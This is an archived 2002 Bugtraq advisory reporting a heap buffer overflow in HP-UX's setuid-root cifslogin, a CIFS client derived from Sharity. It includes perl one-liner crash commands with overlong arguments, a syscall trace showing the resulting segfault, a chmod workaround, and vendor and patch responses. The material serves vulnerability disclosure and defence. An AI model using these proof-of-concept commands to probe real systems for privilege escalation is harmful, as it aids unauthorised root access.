Home page logo
/

bugtraq logo Bugtraq mailing list archives

Sharity Cifslogin Buffer Overflow (arguments)
From: Alex Hernandez <alex_hernandez () ureach com>
Date: Mon, 24 Jun 2002 08:19:52 -0400








Sharity Cifslogin Buffer Overflow (arguments)
=============================================

Author:

** Alex Hernandez <alex_hernandez () ureach com> (C) 2002

** Thanks all the people from Spain and Argentina.
** Greets to: Paco Spain, Gabriel M, L.martins.
** Thanks friends for all ur help Zillion & Kevin from
** Snosoft http://www.snosoft.com :-).


Affected system:
================

HP-UX   ALL


What is Sharity?
================

Sharity is a software package that runs on Unix machines and 
allows you to
mount shares exported by Windows (NT, 95, for Workgroups, 
etc.), OS/2,
samba etc. in your filesystem. It's NOT an ftp-like client like 
the
smbclient program distributed with samba, it really mounts the 
shares in
your filesystem just as NFS does. Since the major release 2, 
Sharity
supports browsing (like the Windows "Network Neighborhood") and 
has a GUI
for dialogs and for the configuration.




Description:
============


TESTED IN HP-UX

This command logs the calling user in to a server. While the 
login
is established, all file accesses by the calling user are 
performed
under the permissions available at the server with the 
credentials
passed to cifslogin. <server> must be the netbios name of the 
server
where you want to log in. If the server is in share-level 
security
mode, you must use the second form and specify the share you 
want to
log in to. The server name must be resolvable through the 
netbios
name service or with DNS. If neither gives an IP address, you 
can
configure the IP address explicitly in the configuration file.
Valid options are:


    -h   Print short help and exit
    -U <username> Login on server as this user. By default, the 
remote
         username is the same as the calling user's local name.
    -D <domain> Send this domain name to server. If not 
specified,
         Sharity's default domain is used. Some servers accept 
connects
         only from clients from their own domain.
    -P <password> Password given in commandline. Using this 
option is
         STRONGLY discouraged because it will write your 
password to the
         shell's history file.
    -S   Read password from standard input (implies -N). This 
option can
         be used if the password is created by an external 
program (e.g.
         retrieved from a database).
    -N   Don't prompt for a password. If no password is given 
by the -P
         or -S options, use an empty password.
    -u   Allow sending password unencrypted. Sharity does not 
allow
         sending unencrypted passwords by default (for security 
reasons).

If you don't specify a share name for a share-level security 
server,
cifslogin prompts the user for the share name.

If the password is not supplied with the -S or -P option and if
the user is not already logged in, cifslogin prompts the user 
for
a password.

A security vulnerability in the product allows local users to 
overflow one of 
the parameters (-U, -D, -P, -S, -N, -u,) and cause the 
application to execute 
arbitrary code. Since the program is setuid root, elevated 
privileges 
can be gained. 


In case that the attacker provide an overlong filename (for 
example, longer
than 10000 bytes) for example parameter "-P", it would overflow 
a dynamic 
allocated buffer.The attacker could modify arbitrary memory 
address (such as 
saved return address, and function pointer, etc.) with some 
features of 
malloc()/free() implementation by overwriting the border data 
structure 
of the next dynamic memory chunk.


On HP-UX platform, attacker could obtain root group privilege;



Exploit:
==========


$ id
uid=110(alex) gid=102(informix)
$

$ uname -a
HP-UX Lab02 B.11.11 U 9000/800 1613339393 unlimited-user license
$

$ ls -la /opt/cifsclient/bin/cifslogin
-rwsr-xr-x   1 root       users        53248 Mar 28  
2001 /opt/cifsclient/bin/cifslogin


$ /opt/cifsclient/bin/cifslogin -P `perl -e '{print "A"x10000}'`
Memory fault

$


MAPPED WITH TUSC:

Brief description about the command:

tusc-7.3

Traces the system calls a process invokes in HP-UX 11. It 
displays arguments in a symbolic way, shows the
first bytes of read and write buffers and shows signal 
information when available. Tusc can attach to live
processes by providing PIDs as arguments. This release also 
provides a truss command compatible with the
equivalent Solaris utility. Note that source code is 
unavailable for tusc and that the shipped tusc binary
ONLY works on HP-UX 11.X. Please download the equivalent 
package for HP-UX 10.X - called trace -
if you don't have HP-UX 11.X.

Download for HP-UX:

http://hpux.cs.utah.edu/hppd/hpux/Sysadmin/tusc-7.3/



Proof of Concept:


$ ./tusc /opt/cifsclient/bin/cifslogin -P `perl -
e '{print "A"x10000}'`

execve("/opt/cifsclient/bin/cifslogin", 0x7f7f2b68, 
0x7f7f2b78) ........................................ = 0 [32-
bit]
utssys(0x7f7f4c50, 0, 
0) .............................................................
.................. = 0
open("/usr/lib/dld.sl", O_RDONLY, 
025564) ........................................................
...... = 3
read(3, "02\v010e0512@ \0\0\0\0\0\0\0\0\0".., 
128) ..................................................... = 128
lseek(3, 128, 
SEEK_SET) ......................................................
.......................... = 128
read(3, "10\0\004\0\0\0( \002\0ac\0\0\0\0".., 
48) ...................................................... = 48
mmap(NULL, 131244, PROT_READ|PROT_EXEC, MAP_SHARED|MAP_SHLIB, 
3, 0x9000) ............................... = 0xc0010000
mmap(NULL, 14696, PROT_READ|PROT_WRITE|PROT_EXEC, 
MAP_PRIVATE|MAP_SHLIB, 3, 0x2a000) ................... = 
0x7b050000
close
(3) ............................................................
................................... = 0
getuid
() .............................................................
.................................. = 110 (110)
getuid
() .............................................................
.................................. = 110 (110)
getgid
() .............................................................
.................................. = 102 (102)
getgid
() .............................................................
.................................. = 102 (102)
mmap(NULL, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, 
MAP_PRIVATE|MAP_ANONYMOUS, -1, NULL) .................. = 
0x7b04e000
sysconf
(_SC_CPU_VERSION) ..............................................
................................. = 532
open("/opt/graphics/OpenGL/lib/libogltls.sl", O_RDONLY, 
0) ............................................. ERR#2 ENOENT
open("/usr/lib/libc.2", O_RDONLY, 
0) .............................................................
...... = 3
fstat(3, 
0x7f7f54c8) ....................................................
............................... = 0
read(3, "0214010e0512@ \0\0\0\0\0\0\0\0\0".., 
128) ..................................................... = 128
lseek(3, 128, 
SEEK_SET) ......................................................
.......................... = 128
read(3, "10\0\004\0\0\0( \014( , \0\010\0".., 
48) ...................................................... = 48
read(3, "80\0\0\v\0\0\004\0\0\0\0", 
12) ............................................................
.... = 12
lseek(3, 446464, 
SEEK_SET) ......................................................
....................... = 446464
read(3, "058cy 10\0\0\a90\0\0M e8\0\0\002".., 
112) ..................................................... = 112
mmap(NULL, 1323008, PROT_READ|PROT_EXEC, MAP_SHARED|MAP_SHLIB, 
3, 0x6d000) ............................. = 0xc0100000
mmap(NULL, 45056, PROT_READ|PROT_WRITE|PROT_EXEC, 
MAP_PRIVATE|MAP_ANONYMOUS|MAP_SHLIB, -1, NULL) ....... = 
0x7b043000
mmap(0x7b03b000, 32768, PROT_READ|PROT_WRITE|PROT_EXEC, 
MAP_PRIVATE|MAP_FIXED|MAP_SHLIB, 3, 0x1b0000) .. = 0x7b03b000
mmap(NULL, 16384, PROT_READ|PROT_WRITE|PROT_EXEC, 
MAP_PRIVATE|MAP_ANONYMOUS, -1, NULL) ................. = 
0x7b037000
close
(3) ............................................................
................................... = 0
open("/usr/lib/libdld.2", O_RDONLY, 
0) .............................................................
.... = 3
fstat(3, 
0x7f7f55c8) ....................................................
............................... = 0
read(3, "02\v010e0512@ \0\0\0\0\0\0\0\0\0".., 
128) ..................................................... = 128
lseek(3, 128, 
SEEK_SET) ......................................................
.......................... = 128
read(3, "10\0\004\0\0\0( \0\0$ e4\0\010\0".., 
48) ...................................................... = 48
read(3, "80\0\0\v\0\0\004\0\0\0\0", 
12) ............................................................
.... = 12
lseek(3, 8192, 
SEEK_SET) ......................................................
......................... = 8192
read(3, "058cy 10\0\0\0\f\0\001ac\0\0\001".., 
112) ..................................................... = 112
mmap(NULL, 12288, PROT_READ|PROT_EXEC, MAP_SHARED|MAP_SHLIB, 3, 
0x2000) ................................ = 0xc0004000
mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, 
MAP_PRIVATE|MAP_SHLIB, 3, 0x5000) ..................... = 
0x7b036000
close
(3) ............................................................
................................... = 0
open("/usr/lib/libc.2", O_RDONLY, 
0) .............................................................
...... = 3
fstat(3, 
0x7f7f56c8) ....................................................
............................... = 0
read(3, "0214010e0512@ \0\0\0\0\0\0\0\0\0".., 
128) ..................................................... = 128
lseek(3, 128, 
SEEK_SET) ......................................................
.......................... = 128
read(3, "10\0\004\0\0\0( \014( , \0\010\0".., 
48) ...................................................... = 48
read(3, "80\0\0\v\0\0\004\0\0\0\0", 
12) ............................................................
.... = 12
lseek(3, 446464, 
SEEK_SET) ......................................................
....................... = 446464
read(3, "058cy 10\0\0\a90\0\0M e8\0\0\002".., 
112) ..................................................... = 112
mmap(NULL, 1323008, PROT_READ|PROT_EXEC, MAP_SHARED|MAP_SHLIB, 
3, 0x6d000) ............................. ERR#12 ENOMEM
close
(3) ............................................................
................................... = 0
open("/usr/lib/libnsl.1", O_RDONLY, 
0) .............................................................
.... = 3
fstat(3, 
0x7f7f54c8) ....................................................
............................... = 0
read(3, "0210010e0512@ \0\0\0\0\0\0\0\0\0".., 
128) ..................................................... = 128
lseek(3, 128, 
SEEK_SET) ......................................................
.......................... = 128
read(3, "10\0\004\0\0\0( \0\b9384\0\010\0".., 
48) ...................................................... = 48
read(3, "80\0\0\v\0\0\004\0\0\0\0", 
12) ............................................................
.... = 12
lseek(3, 131072, 
SEEK_SET) ......................................................
....................... = 131072
read(3, "058cy 10\0\004  \0\0; L \0\0\002".., 
112) ..................................................... = 112
mmap(NULL, 565248, PROT_READ|PROT_EXEC, MAP_SHARED|MAP_SHLIB, 
3, 0x20000) .............................. = 0xc0280000
mmap(NULL, 24576, PROT_READ|PROT_WRITE|PROT_EXEC, 
MAP_PRIVATE|MAP_ANONYMOUS|MAP_SHLIB, -1, NULL) ....... = 
0x7b030000
mmap(0x7b029000, 28672, PROT_READ|PROT_WRITE|PROT_EXEC, 
MAP_PRIVATE|MAP_FIXED|MAP_SHLIB, 3, 0xaa000) ... = 0x7b029000
mmap(NULL, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, 
MAP_PRIVATE|MAP_ANONYMOUS, -1, NULL) .................. = 
0x7b027000
close
(3) ............................................................
................................... = 0
stat("/usr/lib/libxti.2", 
0x7f7f5500) ....................................................
.............. = 0
mmap(NULL, 16384, PROT_READ|PROT_WRITE|PROT_EXEC, 
MAP_PRIVATE|MAP_ANONYMOUS, -1, NULL) ................. = 
0x7b023000
open("/usr/lib/libxti.2", O_RDONLY, 
0) .............................................................
.... = 3
fstat(3, 
0x7f7f55c8) ....................................................
............................... = 0
read(3, "0210010e0512@ \0\0\0\0\0\0\0\0\0".., 
128) ..................................................... = 128
lseek(3, 128, 
SEEK_SET) ......................................................
.......................... = 128
read(3, "10\0\004\0\0\0( \001~ l \0\010\0".., 
48) ...................................................... = 48
read(3, "80\0\0\v\0\0\004\0\0\0\0", 
12) ............................................................
.... = 12
lseek(3, 28672, 
SEEK_SET) ......................................................
........................ = 28672
read(3, "058cy 10\0\0\0d8\0\0\ac0\0\0\001".., 
112) ..................................................... = 112
mmap(NULL, 98304, PROT_READ|PROT_EXEC, MAP_SHARED|MAP_SHLIB, 3, 
0x7000) ................................ = 0xc0060000
mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, 
MAP_PRIVATE|MAP_ANONYMOUS|MAP_SHLIB, -1, NULL) ........ = 
0x7b022000
mmap(0x7b020000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, 
MAP_PRIVATE|MAP_FIXED|MAP_SHLIB, 3, 0x1f000) .... = 0x7b020000
close
(3) ............................................................
................................... = 0
mmap(NULL, 80, PROT_READ|PROT_WRITE|PROT_EXEC, 
MAP_PRIVATE|MAP_ANONYMOUS, -1, NULL) .................... = 
0x7b01f000
sigsetreturn(0x7b038fce, 0x6211988, 
1392) ..........................................................
.... = 0
alarm
(0) ............................................................
................................... = 0
getuid
() .............................................................
.................................. = 110 (110)
getuid
() .............................................................
.................................. = 110 (110)

  Received signal 11, SIGSEGV, in user mode, [SIG_DFL], partial 
siginfo
    Siginfo: si_code: I_NONEXIST, faulting address: 0x4141414d, 
si_errno: 0
    PC: 0xc01ef413, instruction: 0x443f0018
exit(11) 
[implicit] .....................................................
...............................
WIFSIGNALED(SIGSEGV)

$


Others Parameters Vulnerables:


$ /opt/cifsclient/bin/cifslogin -P `perl -e '{print "A"x2072}'`
Memory fault

$ /opt/cifsclient/bin/cifslogin -s `perl -e '{print "A"x2072}'`
Memory fault

$ /opt/cifsclient/bin/cifslogin -f `perl -e '{print "A"x2072}'`
Memory fault

$ /opt/cifsclient/bin/cifslogin -u `perl -e '{print "A"x2072}'`
Memory fault

$ /opt/cifsclient/bin/cifslogin -S `perl -e '{print "A"x2072}'`
Memory fault

$ /opt/cifsclient/bin/cifslogin -N `perl -e '{print "A"x2072}'`
Memory fault



Workaround:
===================

Temporarily remove the suid root or sgid root attribute of 
cifslogin:


# chmod a-s /opt/cifsclient/bin/cifslogin




Vendor Status:
==============

---
Contact information:
e-mail: sharity () obdev at
www:    http://www.obdev.at/
Author: Christian Starkjohann <cs () obdev at>

Response:

Date   Sat, 15 June 2002 8:54:01am  
From   Sharity Support <sharity-support () obdev at>  Add to 
address book  
To   <alex_hernandez () ureach com> 


The /opt/cifsclient/bin/cifslogin program is NOT part of 
Sharity. This 
is HP's CIFS client. HP has based this client on an old version 
of 
Sharity which they have licensed.

I will forward your report to the people at HP who are 
responsible for 
this software. I'll give credits to you, of course.

Thanks for reporting this problem!

Regards, Christian.

---
Sharity Support, Objective Development.
sharity-support () obdev at



---------
security-alert () hp com
secure () hpchs cup hp com




Response:

Date   Mon, 17 June 2002 2:40:18pm  
From   HP S/W Security Team <secure () hpchs cup hp com>  Add to 
address book  
To   alex_hernandez () ureach com 

Hello Mr: Hernandez,

Please read it, retrieve the patch, and apply
it to your Lab02 11.11 installation.  The patch can
be retrieved *without* a support contract by registering
with itrc.hp.com.  (Registration is for simplified
mailing list maintenance on our part.  Without that -
no patches can be retrieved.)


Yours Truly,
WTEC
HP S/W Security Team.
--



FIXES:
======

Recommended solution

*REVISED01*

 -->>>Upgrade to A.01.06, and then install patch PHNE_24164 for
 -->>>HP-UX release 11.00 or 11.11.
 -->>>When available, A.01.07 will include this fix.
 -->>>Download this application software from
 -->>>www.software.hp.com,  under the Network and System
 -->>>Management area.  Download the patch from itrc.hp.com.

To subscribe to automatically receive future NEW HP Security
Bulletins from the HP IT Resource Center via electronic mail,
do the following:

Use your browser to get to the HP IT Resource Center page
at:

http://itrc.hp.com

 

For information on the Security Patch Check tool, see:

http://www.software.hp.com/cgi-
bin/swdepot_parser.cgi/cgi/displayProductInfo
.pl?productNumber=B6834AA"

This vulnerabilty can be fix with SAMBA Bugs HP-UX:

**REVISED01**HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #0155, 
27 June '01
LAST REVISED: 15 August '01 
 ---------------------------------------------------------------
--------

The information in the following Security Bulletin should be 
acted upon
as soon as possible.  Hewlett-Packard Company will not be 
liable for any
consequences to any customer resulting from customer's failure 
to fully
implement instructions in this Security Bulletin as soon as 
possible.

 ---------------------------------------------------------------
--------

PROBLEM:  CIFS/9000 Server (SAMBA) allows malicious local users
          to overwrite arbitrary files and devices.

PLATFORM: HP 9000 servers running CIFS/9000 Server version 
A.01.06,
          or lower.

DAMAGE:   Arbitrary files and devices can be overwritten.

*REVISED01*
SOLUTION: Upgrade to A.01.06, and then install patch PHNE_24164.
    --->>>When available, A.01.07 will include this fix. 

*REVISED01*
AVAILABILITY:  The patch is available now.

[...]



Alex Hernandez <alex_hernandez () ureach com> (C) 2002










________________________________________________
Get your own "800" number
Voicemail, fax, email, and a lot more
http://www.ureach.com/reg/tag


  By Date           By Thread  

Current thread:
  • Sharity Cifslogin Buffer Overflow (arguments) Alex Hernandez (Jun 26)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]